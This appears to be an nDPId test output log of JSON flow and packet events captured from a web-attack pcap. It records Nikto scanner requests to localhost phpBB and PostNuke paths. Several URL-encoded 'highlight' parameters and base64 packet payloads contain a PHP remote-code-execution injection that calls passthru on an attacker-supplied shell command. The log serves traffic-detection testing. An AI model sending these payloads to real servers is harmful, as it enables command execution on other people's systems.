{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} +01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 